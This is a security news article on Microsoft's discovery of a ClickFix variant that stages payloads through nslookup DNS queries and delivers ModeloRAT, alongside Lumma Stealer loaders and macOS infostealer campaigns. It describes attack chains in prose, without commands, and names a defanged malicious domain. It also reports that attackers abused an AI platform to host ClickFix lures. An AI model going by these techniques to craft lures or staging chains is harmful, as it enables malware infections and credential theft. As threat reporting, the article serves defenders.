Microsoft has uncovered a new evolution of the ClickFix social engineering technique, where attackers manipulate users into executing a DNS lookup command to retrieve malicious payloads. The campaign demonstrates how threat actors continue refining ClickFix methods to bypass traditional security defenses.
How the DNS-Based ClickFix Variant Works
In this newly observed attack chain, victims are instructed to run a command via the Windows Run dialog. The command launches cmd.exe and uses the nslookup utility to perform a Domain Name System query against a hard-coded external DNS server instead of the system’s default resolver.
According to Microsoft Threat Intelligence, the DNS response is filtered to extract the “Name:” record, which is then executed as the second-stage payload. By using DNS as a lightweight staging mechanism, attackers reduce reliance on conventional web-based requests and blend malicious traffic with routine network activity.
ClickFix attacks typically rely on phishing emails, malicious advertisements, or compromised websites. Victims are redirected to fake CAPTCHA pages or troubleshooting instructions that convince them to manually execute commands in Windows or macOS terminals. Because users infect their own machines, this technique frequently bypasses endpoint security controls.
Over the past two years, ClickFix has expanded into several variants including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.
Malware Chain Leading to ModeloRAT
After the DNS lookup retrieves the payload, the infection chain continues with the download of a ZIP archive from azwsappdev[.]com. Inside the archive, a malicious Python script executes reconnaissance commands and deploys a Visual Basic Script responsible for launching ModeloRAT, a Python-based remote access trojan previously linked to CrashFix campaigns.
To maintain persistence, the attackers create a Windows shortcut file in the Startup folder that points to the malicious VBScript, ensuring the malware runs every time the system boots.
Lumma Stealer and CastleLoader Activity Surge
The disclosure comes amid rising activity involving Lumma Stealer, a widely distributed information-stealing malware. Security researchers have linked recent campaigns to CastleLoader, a malware loader associated with a threat actor known as GrayBravo.
CastleLoader performs checks for virtualization environments and security software before decrypting and launching Lumma Stealer directly in memory. In addition to ClickFix-based distribution, attackers use cracked software sites and pirated movie downloads as bait, disguising malware as legitimate installers or media files.
Another loader, RenEngine Loader, has also been used to spread Lumma Stealer since early 2025. Often disguised as game cheats or pirated tools such as CorelDRAW, RenEngine deploys a secondary loader called Hijack Loader, which ultimately installs the stealer. Data indicates infections have impacted users across Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France.
Expanding ClickFix Ecosystem Across Platforms
Security researchers report multiple campaigns using ClickFix-style lures to deliver various malware families:
- macOS campaigns distributing Odyssey Stealer, a rebranded version of Poseidon Stealer derived from Atomic macOS Stealer, targeting browser wallet extensions and desktop crypto wallets.
- Fake CAPTCHA pages on compromised websites deploying StealC malware on Windows systems.
- Phishing emails containing malicious SVG files that trigger PowerShell execution and deploy the .NET infostealer Stealerium.
- Abuse of AI platforms such as Anthropic Claude to host malicious ClickFix instructions shared through sponsored search results, leading to Atomic Stealer and MacSync Stealer infections.
- Fake technical articles impersonating Apple Support that trick macOS users into executing terminal commands.
- ClearFake campaigns leveraging compromised WordPress sites and EtherHiding techniques via blockchain infrastructure to deliver Lumma Stealer.
Researchers emphasize that ClickFix succeeds because it exploits procedural trust rather than software vulnerabilities. The instructions appear similar to legitimate troubleshooting steps, making victims unaware that they are executing malicious code.
Rising Threat to macOS and Cryptocurrency Users
Recent analysis highlights that macOS systems are increasingly targeted by infostealers, especially those focusing on cryptocurrency theft. Attackers often acquire valid Apple developer signatures to bypass security mechanisms such as Gatekeeper.
Security experts warn that the long-standing belief that Macs are immune to malware is outdated and risky. Organizations should monitor for unusual terminal activity, unauthorized data exfiltration from browser storage or Keychain, and suspicious blockchain-related network connections.
As ClickFix techniques continue evolving, defenders must remain vigilant against social engineering campaigns that combine DNS abuse, malware loaders, and cross-platform infostealers.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
